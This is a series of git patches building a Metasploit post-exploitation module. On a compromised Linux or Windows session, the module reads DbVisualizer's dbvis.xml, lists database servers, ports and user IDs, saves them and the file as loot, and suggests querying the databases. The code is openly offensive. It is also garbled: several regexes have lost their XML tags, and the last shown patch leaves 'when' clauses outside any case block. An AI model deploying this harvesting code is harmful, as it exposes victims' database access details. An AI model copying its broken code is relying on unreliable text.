From bcbb0b4fde39011b5b3375ff2efcc98ca0fda9ea Mon Sep 17 00:00:00 2001 From: David Bloom Date: Mon, 14 Jul 2014 10:49:20 +0200 Subject: [PATCH 01/23] dbvis connections gathering DbVisualizer stores the user database configuration in dbvis.xml. This module retrieves the connections settings from this file. --- modules/post/multi/gather/dbvis_enum.rb | 162 ++++++++++++++++++++++++ 1 file changed, 162 insertions(+) create mode 100644 modules/post/multi/gather/dbvis_enum.rb diff --git a/modules/post/multi/gather/dbvis_enum.rb b/modules/post/multi/gather/dbvis_enum.rb new file mode 100644 index 0000000000..40ab8dec2b --- /dev/null +++ b/modules/post/multi/gather/dbvis_enum.rb @@ -0,0 +1,162 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +require 'msf/core/auxiliary/report' +require "resolv" + +class Metasploit3 < Msf::Post + + include Msf::Post::File + include Msf::Post::Unix + include Msf::Auxiliary::Report + + def initialize(info={}) + super( update_info( info, + 'Name' => 'Dbvis Connections settings', + 'Description' => %q{ + DbVisualizer stores the user database configuration in dbvis.xml. + This module retrieves the connections settings from this file. + | Author: David Bloom | + }, + 'License' => MSF_LICENSE, + 'Author' => [ 'David Bloom <@philophobia78>' ], + 'Platform' => %w{ linux win }, + 'SessionTypes' => [ 'meterpreter', 'shell'] + )) + end + + def run + + db_table = Rex::Ui::Text::Table.new( + 'Header' => "Dbvis available databases", + 'Indent' => 2, + 'Columns' => + [ + "Alias", + "Type", + "Server", + "Port", + "Database", + "Namespace", + "Userid", + ]) + + + dbs = [] + + case session.platform + when /linux/ + user = session.shell_command("whoami").chomp + print_status("Current user is #{user}") + if (user =~ /root/) + user_base="/root/" + else + user_base="/home/#{user}/" + end + dbvis_file = "#{user_base}.dbvis/config70/dbvis.xml" + when /win/ + if session.type =~ /meterpreter/ + user_profile = session.sys.config.getenv('USERPROFILE') + else + user_profile = cmd_exec("echo %USERPROFILE%").strip + end + dbvis_file = user_profile + "\\.dbvis\\config70\\dbvis.xml" + end + + db = {} + print_status("Reading: #{dbvis_file}") + dbfound=false + # read config file + read_file(dbvis_file).each_line do |line| + if (line =~ //) + dbfound=false + if db[:Database].nil? + db[:Database]=""; + end + if db[:Namespace].nil? + db[:Namespace]=""; + end + # save + dbs << db if (db[:Alias] and db[:Type] and db[:Server] and db[:Port] ) + db = {} + end + if (dbfound=true) + # get the alias + if (line =~ /([\S+\s+]+)<\/Alias>/i) + db[:Alias] = $1 + end + + # get the type + if (line =~ /([\S+\s+]+)<\/Type>/i) + db[:Type] = $1 + end + # get the user + if (line =~ /([\S+\s+]+)<\/Userid>/i) + db[:Userid] = $1 + end + + # get the server + if (line =~ /([\S+\s+]+)<\/UrlVariable>/i) + db[:Server] = $1 + end + + # get the port + if (line =~ /([\S+]+)<\/UrlVariable>/i) + db[:Port] = $1 + end + + # get the database + if (line =~ /([\S+\s+]+)<\/UrlVariable>/i) + db[:Database] = $1 + end + + # get the Namespace + if (line =~ /([\S+\s+]+)<\/UrlVariable>/i) + db[:Namespace] = $1 + end + end + end + end + + # print out + dbs.each do |db| + if (!!(db[:Server] =~ Resolv::IPv4::Regex)) + print_good("Reporting #{db[:Server]} ") + report_host(:host => db[:Server]); + end + db_table << [ db[:Alias] , db[:Type] , db[:Server], db[:Port], db[:Database], db[:Namespace], db[:Userid]] + end + + if db_table.rows.empty? + print_status("No database settings found") + else + print_line("\n" + db_table.to_s) + + print_good("Try to query listed databases with dbviscmd.sh (or .bat) -connection -sql and have fun !") + print_good("") + # store found databases + p = store_loot( + "dbvis.databases", + "text/csv", + session, + db_table.to_csv, + "dbvis_databases.txt", + "dbvis databases") + + print_good("Databases settings stored in: #{p.to_s}") + + end + print_status("Downloading #{dbvis_file}") + p = store_loot("dbvis.xml", "text/xml", session, read_file(dbvis_file), "#{dbvis_file}", "dbvis config") + print_good "dbvis.xml saved to #{p.to_s}" + + rescue ::Exception => e + print_error("Couldn't read #{dbvis_file}: #{e.to_s}") + end + +end From 0ef0f6aae1000452ca5110f8cab37d84adb7d86a Mon Sep 17 00:00:00 2001 From: David Bloom Date: Mon, 14 Jul 2014 10:54:43 +0200 Subject: [PATCH 02/23] Update dbvis_enum.rb --- modules/post/multi/gather/dbvis_enum.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/post/multi/gather/dbvis_enum.rb b/modules/post/multi/gather/dbvis_enum.rb index 40ab8dec2b..f853e84001 100644 --- a/modules/post/multi/gather/dbvis_enum.rb +++ b/modules/post/multi/gather/dbvis_enum.rb @@ -19,7 +19,7 @@ class Metasploit3 < Msf::Post 'Description' => %q{ DbVisualizer stores the user database configuration in dbvis.xml. This module retrieves the connections settings from this file. - | Author: David Bloom | + }, 'License' => MSF_LICENSE, 'Author' => [ 'David Bloom <@philophobia78>' ], From 667b1363f356bda78a45738941b1217d2a59635a Mon Sep 17 00:00:00 2001 From: David Bloom Date: Mon, 14 Jul 2014 10:57:53 +0200 Subject: [PATCH 03/23] Delete dbvis_enum.rb --- modules/post/multi/gather/dbvis_enum.rb | 162 ------------------------ 1 file changed, 162 deletions(-) delete mode 100644 modules/post/multi/gather/dbvis_enum.rb diff --git a/modules/post/multi/gather/dbvis_enum.rb b/modules/post/multi/gather/dbvis_enum.rb deleted file mode 100644 index f853e84001..0000000000 --- a/modules/post/multi/gather/dbvis_enum.rb +++ /dev/null @@ -1,162 +0,0 @@ -## -# This module requires Metasploit: http//metasploit.com/download -# Current source: https://github.com/rapid7/metasploit-framework -## - -require 'msf/core' -require 'msf/core/auxiliary/report' -require "resolv" - -class Metasploit3 < Msf::Post - - include Msf::Post::File - include Msf::Post::Unix - include Msf::Auxiliary::Report - - def initialize(info={}) - super( update_info( info, - 'Name' => 'Dbvis Connections settings', - 'Description' => %q{ - DbVisualizer stores the user database configuration in dbvis.xml. - This module retrieves the connections settings from this file. - - }, - 'License' => MSF_LICENSE, - 'Author' => [ 'David Bloom <@philophobia78>' ], - 'Platform' => %w{ linux win }, - 'SessionTypes' => [ 'meterpreter', 'shell'] - )) - end - - def run - - db_table = Rex::Ui::Text::Table.new( - 'Header' => "Dbvis available databases", - 'Indent' => 2, - 'Columns' => - [ - "Alias", - "Type", - "Server", - "Port", - "Database", - "Namespace", - "Userid", - ]) - - - dbs = [] - - case session.platform - when /linux/ - user = session.shell_command("whoami").chomp - print_status("Current user is #{user}") - if (user =~ /root/) - user_base="/root/" - else - user_base="/home/#{user}/" - end - dbvis_file = "#{user_base}.dbvis/config70/dbvis.xml" - when /win/ - if session.type =~ /meterpreter/ - user_profile = session.sys.config.getenv('USERPROFILE') - else - user_profile = cmd_exec("echo %USERPROFILE%").strip - end - dbvis_file = user_profile + "\\.dbvis\\config70\\dbvis.xml" - end - - db = {} - print_status("Reading: #{dbvis_file}") - dbfound=false - # read config file - read_file(dbvis_file).each_line do |line| - if (line =~ //) - dbfound=false - if db[:Database].nil? - db[:Database]=""; - end - if db[:Namespace].nil? - db[:Namespace]=""; - end - # save - dbs << db if (db[:Alias] and db[:Type] and db[:Server] and db[:Port] ) - db = {} - end - if (dbfound=true) - # get the alias - if (line =~ /([\S+\s+]+)<\/Alias>/i) - db[:Alias] = $1 - end - - # get the type - if (line =~ /([\S+\s+]+)<\/Type>/i) - db[:Type] = $1 - end - # get the user - if (line =~ /([\S+\s+]+)<\/Userid>/i) - db[:Userid] = $1 - end - - # get the server - if (line =~ /([\S+\s+]+)<\/UrlVariable>/i) - db[:Server] = $1 - end - - # get the port - if (line =~ /([\S+]+)<\/UrlVariable>/i) - db[:Port] = $1 - end - - # get the database - if (line =~ /([\S+\s+]+)<\/UrlVariable>/i) - db[:Database] = $1 - end - - # get the Namespace - if (line =~ /([\S+\s+]+)<\/UrlVariable>/i) - db[:Namespace] = $1 - end - end - end - end - - # print out - dbs.each do |db| - if (!!(db[:Server] =~ Resolv::IPv4::Regex)) - print_good("Reporting #{db[:Server]} ") - report_host(:host => db[:Server]); - end - db_table << [ db[:Alias] , db[:Type] , db[:Server], db[:Port], db[:Database], db[:Namespace], db[:Userid]] - end - - if db_table.rows.empty? - print_status("No database settings found") - else - print_line("\n" + db_table.to_s) - - print_good("Try to query listed databases with dbviscmd.sh (or .bat) -connection -sql and have fun !") - print_good("") - # store found databases - p = store_loot( - "dbvis.databases", - "text/csv", - session, - db_table.to_csv, - "dbvis_databases.txt", - "dbvis databases") - - print_good("Databases settings stored in: #{p.to_s}") - - end - print_status("Downloading #{dbvis_file}") - p = store_loot("dbvis.xml", "text/xml", session, read_file(dbvis_file), "#{dbvis_file}", "dbvis config") - print_good "dbvis.xml saved to #{p.to_s}" - - rescue ::Exception => e - print_error("Couldn't read #{dbvis_file}: #{e.to_s}") - end - -end From 72d9587a50a300813b3aa15f0cb144e16fa66579 Mon Sep 17 00:00:00 2001 From: David Bloom Date: Mon, 14 Jul 2014 20:08:48 +0200 Subject: [PATCH 04/23] DbVisualizer stores the user database configuration in dbvis.xml This module retrieves the connections settings from this file --- modules/post/multi/gather/dbvis_enum.rb | 161 ++++++++++++++++++++++++ 1 file changed, 161 insertions(+) create mode 100644 modules/post/multi/gather/dbvis_enum.rb diff --git a/modules/post/multi/gather/dbvis_enum.rb b/modules/post/multi/gather/dbvis_enum.rb new file mode 100644 index 0000000000..66062c01ca --- /dev/null +++ b/modules/post/multi/gather/dbvis_enum.rb @@ -0,0 +1,161 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +require 'msf/core/auxiliary/report' +require "resolv" + +class Metasploit3 < Msf::Post + + include Msf::Post::File + include Msf::Post::Unix + include Msf::Auxiliary::Report + + def initialize(info={}) + super( update_info( info, + 'Name' => 'Dbvis Connections settings', + 'Description' => %q{ + DbVisualizer stores the user database configuration in dbvis.xml. + This module retrieves the connections settings from this file. + }, + 'License' => MSF_LICENSE, + 'Author' => [ 'David Bloom <@philophobia78>' ], + 'Platform' => %w{ linux win }, + 'SessionTypes' => [ 'meterpreter', 'shell'] + )) + end + + def run + + db_table = Rex::Ui::Text::Table.new( + 'Header' => "Dbvis available databases", + 'Indent' => 2, + 'Columns' => + [ + "Alias", + "Type", + "Server", + "Port", + "Database", + "Namespace", + "Userid", + ]) + + + dbs = [] + + case session.platform + when /linux/ + user = session.shell_command("whoami").chomp + print_status("Current user is #{user}") + if (user =~ /root/) + user_base="/root/" + else + user_base="/home/#{user}/" + end + dbvis_file = "#{user_base}.dbvis/config70/dbvis.xml" + when /win/ + if session.type =~ /meterpreter/ + user_profile = session.sys.config.getenv('USERPROFILE') + else + user_profile = cmd_exec("echo %USERPROFILE%").strip + end + dbvis_file = user_profile + "\\.dbvis\\config70\\dbvis.xml" + end + + db = {} + print_status("Reading: #{dbvis_file}") + dbfound=false + # read config file + read_file(dbvis_file).each_line do |line| + if (line =~ //) + dbfound=false + if db[:Database].nil? + db[:Database]=""; + end + if db[:Namespace].nil? + db[:Namespace]=""; + end + # save + dbs << db if (db[:Alias] and db[:Type] and db[:Server] and db[:Port] ) + db = {} + end + if (dbfound=true) + # get the alias + if (line =~ /([\S+\s+]+)<\/Alias>/i) + db[:Alias] = $1 + end + + # get the type + if (line =~ /([\S+\s+]+)<\/Type>/i) + db[:Type] = $1 + end + # get the user + if (line =~ /([\S+\s+]+)<\/Userid>/i) + db[:Userid] = $1 + end + + # get the server + if (line =~ /([\S+\s+]+)<\/UrlVariable>/i) + db[:Server] = $1 + end + + # get the port + if (line =~ /([\S+]+)<\/UrlVariable>/i) + db[:Port] = $1 + end + + # get the database + if (line =~ /([\S+\s+]+)<\/UrlVariable>/i) + db[:Database] = $1 + end + + # get the Namespace + if (line =~ /([\S+\s+]+)<\/UrlVariable>/i) + db[:Namespace] = $1 + end + end + end + end + + # print out + dbs.each do |db| + if (!!(db[:Server] =~ Resolv::IPv4::Regex)) + print_good("Reporting #{db[:Server]} ") + report_host(:host => db[:Server]); + end + db_table << [ db[:Alias] , db[:Type] , db[:Server], db[:Port], db[:Database], db[:Namespace], db[:Userid]] + end + + if db_table.rows.empty? + print_status("No database settings found") + else + print_line("\n" + db_table.to_s) + + print_good("Try to query listed databases with dbviscmd.sh (or .bat) -connection -sql and have fun !") + print_good("") + # store found databases + p = store_loot( + "dbvis.databases", + "text/csv", + session, + db_table.to_csv, + "dbvis_databases.txt", + "dbvis databases") + + print_good("Databases settings stored in: #{p.to_s}") + + end + print_status("Downloading #{dbvis_file}") + p = store_loot("dbvis.xml", "text/xml", session, read_file(dbvis_file), "#{dbvis_file}", "dbvis config") + print_good "dbvis.xml saved to #{p.to_s}" + + rescue ::Exception => e + print_error("Couldn't read #{dbvis_file}: #{e.to_s}") + end + +end From 8f51fd0e459395675e14e5f1c558bf2883291535 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Mon, 14 Jul 2014 14:39:34 -0500 Subject: [PATCH 05/23] Retabbed and reformatted --- modules/post/multi/gather/dbvis_enum.rb | 161 ++++++++++++------------ 1 file changed, 81 insertions(+), 80 deletions(-) diff --git a/modules/post/multi/gather/dbvis_enum.rb b/modules/post/multi/gather/dbvis_enum.rb index 66062c01ca..feb11810a3 100644 --- a/modules/post/multi/gather/dbvis_enum.rb +++ b/modules/post/multi/gather/dbvis_enum.rb @@ -15,10 +15,10 @@ class Metasploit3 < Msf::Post def initialize(info={}) super( update_info( info, - 'Name' => 'Dbvis Connections settings', + 'Name' => 'Dbvis Connections Settings', 'Description' => %q{ DbVisualizer stores the user database configuration in dbvis.xml. - This module retrieves the connections settings from this file. + This module retrieves the connections settings from this file. }, 'License' => MSF_LICENSE, 'Author' => [ 'David Bloom <@philophobia78>' ], @@ -28,7 +28,6 @@ class Metasploit3 < Msf::Post end def run - db_table = Rex::Ui::Text::Table.new( 'Header' => "Dbvis available databases", 'Indent' => 2, @@ -43,7 +42,6 @@ class Metasploit3 < Msf::Post "Userid", ]) - dbs = [] case session.platform @@ -51,7 +49,7 @@ class Metasploit3 < Msf::Post user = session.shell_command("whoami").chomp print_status("Current user is #{user}") if (user =~ /root/) - user_base="/root/" + user_base = "/root/" else user_base="/home/#{user}/" end @@ -67,95 +65,98 @@ class Metasploit3 < Msf::Post db = {} print_status("Reading: #{dbvis_file}") - dbfound=false + dbfound = false + # read config file read_file(dbvis_file).each_line do |line| - if (line =~ //) - dbfound=false - if db[:Database].nil? - db[:Database]=""; - end - if db[:Namespace].nil? - db[:Namespace]=""; - end - # save - dbs << db if (db[:Alias] and db[:Type] and db[:Server] and db[:Port] ) - db = {} - end - if (dbfound=true) - # get the alias - if (line =~ /([\S+\s+]+)<\/Alias>/i) - db[:Alias] = $1 - end - - # get the type - if (line =~ /([\S+\s+]+)<\/Type>/i) - db[:Type] = $1 - end - # get the user - if (line =~ /([\S+\s+]+)<\/Userid>/i) - db[:Userid] = $1 - end - - # get the server - if (line =~ /([\S+\s+]+)<\/UrlVariable>/i) - db[:Server] = $1 - end - - # get the port - if (line =~ /([\S+]+)<\/UrlVariable>/i) - db[:Port] = $1 - end - - # get the database - if (line =~ /([\S+\s+]+)<\/UrlVariable>/i) - db[:Database] = $1 - end - - # get the Namespace - if (line =~ /([\S+\s+]+)<\/UrlVariable>/i) - db[:Namespace] = $1 - end - end - end - end - - # print out - dbs.each do |db| - if (!!(db[:Server] =~ Resolv::IPv4::Regex)) - print_good("Reporting #{db[:Server]} ") - report_host(:host => db[:Server]); + if line =~ // + dbfound=false + if db[:Database].nil? + db[:Database] = ""; + end + if db[:Namespace].nil? + db[:Namespace] = ""; + end + # save + dbs << db if (db[:Alias] and db[:Type] and db[:Server] and db[:Port] ) + db = {} end - db_table << [ db[:Alias] , db[:Type] , db[:Server], db[:Port], db[:Database], db[:Namespace], db[:Userid]] + + if dbfound = true + # get the alias + if (line =~ /([\S+\s+]+)<\/Alias>/i) + db[:Alias] = $1 + end + + # get the type + if (line =~ /([\S+\s+]+)<\/Type>/i) + db[:Type] = $1 + end + + # get the user + if (line =~ /([\S+\s+]+)<\/Userid>/i) + db[:Userid] = $1 + end + + # get the server + if (line =~ /([\S+\s+]+)<\/UrlVariable>/i) + db[:Server] = $1 + end + + # get the port + if (line =~ /([\S+]+)<\/UrlVariable>/i) + db[:Port] = $1 + end + + # get the database + if (line =~ /([\S+\s+]+)<\/UrlVariable>/i) + db[:Database] = $1 + end + + # get the Namespace + if (line =~ /([\S+\s+]+)<\/UrlVariable>/i) + db[:Namespace] = $1 + end + end + end + end + + # print out + dbs.each do |db| + if (!!(db[:Server] =~ Resolv::IPv4::Regex)) + print_good("Reporting #{db[:Server]} ") + report_host(:host => db[:Server]); end - if db_table.rows.empty? - print_status("No database settings found") - else - print_line("\n" + db_table.to_s) + db_table << [ db[:Alias] , db[:Type] , db[:Server], db[:Port], db[:Database], db[:Namespace], db[:Userid]] + end - print_good("Try to query listed databases with dbviscmd.sh (or .bat) -connection -sql and have fun !") - print_good("") - # store found databases - p = store_loot( + if db_table.rows.empty? + print_status("No database settings found") + else + print_line("\n" + db_table.to_s) + + print_good("Try to query listed databases with dbviscmd.sh (or .bat) -connection -sql and have fun !") + print_good("") + # store found databases + p = store_loot( "dbvis.databases", "text/csv", session, db_table.to_csv, "dbvis_databases.txt", "dbvis databases") + print_good("Databases settings stored in: #{p.to_s}") + end - print_good("Databases settings stored in: #{p.to_s}") + print_status("Downloading #{dbvis_file}") + p = store_loot("dbvis.xml", "text/xml", session, read_file(dbvis_file), "#{dbvis_file}", "dbvis config") + print_good "dbvis.xml saved to #{p.to_s}" - end - print_status("Downloading #{dbvis_file}") - p = store_loot("dbvis.xml", "text/xml", session, read_file(dbvis_file), "#{dbvis_file}", "dbvis config") - print_good "dbvis.xml saved to #{p.to_s}" - - rescue ::Exception => e - print_error("Couldn't read #{dbvis_file}: #{e.to_s}") + rescue ::Exception => e + print_error("Couldn't read #{dbvis_file}: #{e.to_s}") end end From b5e556519b6d50a444d70c321d40d6d09bb716d8 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Mon, 14 Jul 2014 14:53:27 -0500 Subject: [PATCH 06/23] Change = to == This is an if condition, not an assignment --- modules/post/multi/gather/dbvis_enum.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/post/multi/gather/dbvis_enum.rb b/modules/post/multi/gather/dbvis_enum.rb index feb11810a3..9b38acdb2b 100644 --- a/modules/post/multi/gather/dbvis_enum.rb +++ b/modules/post/multi/gather/dbvis_enum.rb @@ -84,7 +84,7 @@ class Metasploit3 < Msf::Post db = {} end - if dbfound = true + if dbfound == true # get the alias if (line =~ /([\S+\s+]+)<\/Alias>/i) db[:Alias] = $1 From 3b6947c1d7bc5b4d1bb91347fd055e076a036fce Mon Sep 17 00:00:00 2001 From: sinn3r Date: Mon, 14 Jul 2014 14:56:38 -0500 Subject: [PATCH 07/23] Use Rex to check IPv4 instead of using resolv --- modules/post/multi/gather/dbvis_enum.rb | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/modules/post/multi/gather/dbvis_enum.rb b/modules/post/multi/gather/dbvis_enum.rb index 9b38acdb2b..a8eb27f305 100644 --- a/modules/post/multi/gather/dbvis_enum.rb +++ b/modules/post/multi/gather/dbvis_enum.rb @@ -5,7 +5,6 @@ require 'msf/core' require 'msf/core/auxiliary/report' -require "resolv" class Metasploit3 < Msf::Post @@ -125,7 +124,7 @@ class Metasploit3 < Msf::Post # print out dbs.each do |db| - if (!!(db[:Server] =~ Resolv::IPv4::Regex)) + if ::Rex::Socket.is_ipv4?(db[:Server].to_s) print_good("Reporting #{db[:Server]} ") report_host(:host => db[:Server]); end From 20e5803592d52f83e471be61452d9bd319787116 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Mon, 14 Jul 2014 14:57:36 -0500 Subject: [PATCH 08/23] Author's Twitter handle should be a comment msfconsole treats whatever is in <> as the author's email, not twitter handle --- modules/post/multi/gather/dbvis_enum.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/post/multi/gather/dbvis_enum.rb b/modules/post/multi/gather/dbvis_enum.rb index a8eb27f305..13fd9f5044 100644 --- a/modules/post/multi/gather/dbvis_enum.rb +++ b/modules/post/multi/gather/dbvis_enum.rb @@ -20,7 +20,7 @@ class Metasploit3 < Msf::Post This module retrieves the connections settings from this file. }, 'License' => MSF_LICENSE, - 'Author' => [ 'David Bloom <@philophobia78>' ], + 'Author' => [ 'David Bloom' ], # Twitter: @philophobia78 'Platform' => %w{ linux win }, 'SessionTypes' => [ 'meterpreter', 'shell'] )) From 8fe3f1a077f0d6ba696e60057c3b90138dc432c8 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Mon, 14 Jul 2014 15:01:03 -0500 Subject: [PATCH 09/23] File should be checked for existence before reading --- modules/post/multi/gather/dbvis_enum.rb | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/modules/post/multi/gather/dbvis_enum.rb b/modules/post/multi/gather/dbvis_enum.rb index 13fd9f5044..b2aca47929 100644 --- a/modules/post/multi/gather/dbvis_enum.rb +++ b/modules/post/multi/gather/dbvis_enum.rb @@ -62,6 +62,11 @@ class Metasploit3 < Msf::Post dbvis_file = user_profile + "\\.dbvis\\config70\\dbvis.xml" end + if file?(dbvis_file) + print_error("File not found: #{dbvis_file}") + return + end + db = {} print_status("Reading: #{dbvis_file}") dbfound = false From 0737deb2a3f593a4966bef0219bfd32b670de144 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Mon, 14 Jul 2014 15:02:23 -0500 Subject: [PATCH 10/23] Remove the last exception handler We're already checking the file path with file?(), so we don't need to use exception handling for this task anymore. --- modules/post/multi/gather/dbvis_enum.rb | 3 --- 1 file changed, 3 deletions(-) diff --git a/modules/post/multi/gather/dbvis_enum.rb b/modules/post/multi/gather/dbvis_enum.rb index b2aca47929..08f0146e71 100644 --- a/modules/post/multi/gather/dbvis_enum.rb +++ b/modules/post/multi/gather/dbvis_enum.rb @@ -158,9 +158,6 @@ class Metasploit3 < Msf::Post print_status("Downloading #{dbvis_file}") p = store_loot("dbvis.xml", "text/xml", session, read_file(dbvis_file), "#{dbvis_file}", "dbvis config") print_good "dbvis.xml saved to #{p.to_s}" - - rescue ::Exception => e - print_error("Couldn't read #{dbvis_file}: #{e.to_s}") end end From cecdcef2e21426b158980cca3a2fd39b66534708 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Mon, 14 Jul 2014 15:14:54 -0500 Subject: [PATCH 11/23] + not preferred --- modules/post/multi/gather/dbvis_enum.rb | 47 ++++++++++++------------- 1 file changed, 22 insertions(+), 25 deletions(-) diff --git a/modules/post/multi/gather/dbvis_enum.rb b/modules/post/multi/gather/dbvis_enum.rb index 08f0146e71..ed3fba51ac 100644 --- a/modules/post/multi/gather/dbvis_enum.rb +++ b/modules/post/multi/gather/dbvis_enum.rb @@ -125,39 +125,36 @@ class Metasploit3 < Msf::Post end end end - end - # print out - dbs.each do |db| - if ::Rex::Socket.is_ipv4?(db[:Server].to_s) - print_good("Reporting #{db[:Server]} ") - report_host(:host => db[:Server]); + # print out + dbs.each do |db| + if ::Rex::Socket.is_ipv4?(db[:Server].to_s) + print_good("Reporting #{db[:Server]} ") + report_host(:host => db[:Server]); + end + + db_table << [ db[:Alias] , db[:Type] , db[:Server], db[:Port], db[:Database], db[:Namespace], db[:Userid]] end - db_table << [ db[:Alias] , db[:Type] , db[:Server], db[:Port], db[:Database], db[:Namespace], db[:Userid]] - end - - if db_table.rows.empty? - print_status("No database settings found") - else - print_line("\n" + db_table.to_s) - - print_good("Try to query listed databases with dbviscmd.sh (or .bat) -connection -sql and have fun !") - print_good("") - # store found databases - p = store_loot( + if db_table.rows.empty? + print_status("No database settings found") + else + print_line("\n") + print_line(db_table.to_s) + print_good("Try to query listed databases with dbviscmd.sh (or .bat) -connection -sql and have fun !") + print_good("") + # store found databases + p = store_loot( "dbvis.databases", "text/csv", session, db_table.to_csv, "dbvis_databases.txt", "dbvis databases") - print_good("Databases settings stored in: #{p.to_s}") - end - - print_status("Downloading #{dbvis_file}") - p = store_loot("dbvis.xml", "text/xml", session, read_file(dbvis_file), "#{dbvis_file}", "dbvis config") - print_good "dbvis.xml saved to #{p.to_s}" - end + print_good("Databases settings stored in: #{p.to_s}") + end + print_status("Downloading #{dbvis_file}") + p = store_loot("dbvis.xml", "text/xml", session, read_file(dbvis_file), "#{dbvis_file}", "dbvis config") + print_good "dbvis.xml saved to #{p.to_s}" end From bec32a01abbe7f13c295ac775c6ec04e0561e415 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Mon, 14 Jul 2014 15:17:54 -0500 Subject: [PATCH 12/23] For for missing an end --- modules/post/multi/gather/dbvis_enum.rb | 1 + 1 file changed, 1 insertion(+) diff --git a/modules/post/multi/gather/dbvis_enum.rb b/modules/post/multi/gather/dbvis_enum.rb index ed3fba51ac..bec99645da 100644 --- a/modules/post/multi/gather/dbvis_enum.rb +++ b/modules/post/multi/gather/dbvis_enum.rb @@ -157,4 +157,5 @@ class Metasploit3 < Msf::Post print_status("Downloading #{dbvis_file}") p = store_loot("dbvis.xml", "text/xml", session, read_file(dbvis_file), "#{dbvis_file}", "dbvis config") print_good "dbvis.xml saved to #{p.to_s}" + end end From 89a877031fe960f4bc059e68cb1bafec9aee9296 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Mon, 14 Jul 2014 15:24:53 -0500 Subject: [PATCH 13/23] I mean "unless", not "if" --- modules/post/multi/gather/dbvis_enum.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/post/multi/gather/dbvis_enum.rb b/modules/post/multi/gather/dbvis_enum.rb index bec99645da..8e42ccdfa0 100644 --- a/modules/post/multi/gather/dbvis_enum.rb +++ b/modules/post/multi/gather/dbvis_enum.rb @@ -62,7 +62,7 @@ class Metasploit3 < Msf::Post dbvis_file = user_profile + "\\.dbvis\\config70\\dbvis.xml" end - if file?(dbvis_file) + unless file?(dbvis_file) print_error("File not found: #{dbvis_file}") return end From 5a821cea9d7d4780cab2925e940afdd2763883d3 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Mon, 14 Jul 2014 15:27:40 -0500 Subject: [PATCH 14/23] Account for EOFError condition --- modules/post/multi/gather/dbvis_enum.rb | 11 ++++++++++- 1 file changed, 10 insertions(+), 1 deletion(-) diff --git a/modules/post/multi/gather/dbvis_enum.rb b/modules/post/multi/gather/dbvis_enum.rb index 8e42ccdfa0..2601a8ed9b 100644 --- a/modules/post/multi/gather/dbvis_enum.rb +++ b/modules/post/multi/gather/dbvis_enum.rb @@ -71,8 +71,17 @@ class Metasploit3 < Msf::Post print_status("Reading: #{dbvis_file}") dbfound = false + raw_xml = "" + begin + raw_xml = read_file(dbvis_file) + rescue EOFError + # If there's nothing in the file, we hit EOFError + print_error("Nothing read from file: #{dbvis_file}, file may be empty") + return + end + # read config file - read_file(dbvis_file).each_line do |line| + raw_xml.each_line do |line| if line =~ // From 4d7bffd713e2de171ebb69d7199a2e3245bd76f2 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Mon, 14 Jul 2014 15:45:17 -0500 Subject: [PATCH 15/23] Change header --- modules/post/multi/gather/dbvis_enum.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/post/multi/gather/dbvis_enum.rb b/modules/post/multi/gather/dbvis_enum.rb index 2601a8ed9b..8efcbbd6e2 100644 --- a/modules/post/multi/gather/dbvis_enum.rb +++ b/modules/post/multi/gather/dbvis_enum.rb @@ -28,7 +28,7 @@ class Metasploit3 < Msf::Post def run db_table = Rex::Ui::Text::Table.new( - 'Header' => "Dbvis available databases", + 'Header' => "Dbvis Databases", 'Indent' => 2, 'Columns' => [ From cc1ba265cb2650aff712d1842fd09880ce34b949 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Mon, 14 Jul 2014 15:49:19 -0500 Subject: [PATCH 16/23] Change module name for consistency --- modules/post/multi/gather/dbvis_enum.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/post/multi/gather/dbvis_enum.rb b/modules/post/multi/gather/dbvis_enum.rb index 8efcbbd6e2..0f2b918409 100644 --- a/modules/post/multi/gather/dbvis_enum.rb +++ b/modules/post/multi/gather/dbvis_enum.rb @@ -14,7 +14,7 @@ class Metasploit3 < Msf::Post def initialize(info={}) super( update_info( info, - 'Name' => 'Dbvis Connections Settings', + 'Name' => 'Multi Gather Dbvis Connections Settings', 'Description' => %q{ DbVisualizer stores the user database configuration in dbvis.xml. This module retrieves the connections settings from this file. From a53341f520d1bb709579bb1c49893771d88bf5b5 Mon Sep 17 00:00:00 2001 From: David Bloom Date: Tue, 15 Jul 2014 12:14:38 +0200 Subject: [PATCH 17/23] Added compatibility with dbvis <= 6 Checking for "config" folder existence if "config70" is not found. --- modules/post/multi/gather/dbvis_enum.rb | 15 ++++++++++++--- 1 file changed, 12 insertions(+), 3 deletions(-) diff --git a/modules/post/multi/gather/dbvis_enum.rb b/modules/post/multi/gather/dbvis_enum.rb index 0f2b918409..3623d4fd70 100644 --- a/modules/post/multi/gather/dbvis_enum.rb +++ b/modules/post/multi/gather/dbvis_enum.rb @@ -63,10 +63,19 @@ class Metasploit3 < Msf::Post end unless file?(dbvis_file) - print_error("File not found: #{dbvis_file}") - return + print_status("File not found: #{dbvis_file}") + print_status("This could be an older version of dbvis, trying old path") + when /linux/ + dbvis_file = "#{user_base}.dbvis/config/dbvis.xml" + when /win/ + dbvis_file = user_profile + "\\.dbvis\\config\\dbvis.xml" + end + unless file?(dbvis_file) + print_error("File not found: #{dbvis_file}") + return + end end - + db = {} print_status("Reading: #{dbvis_file}") dbfound = false From 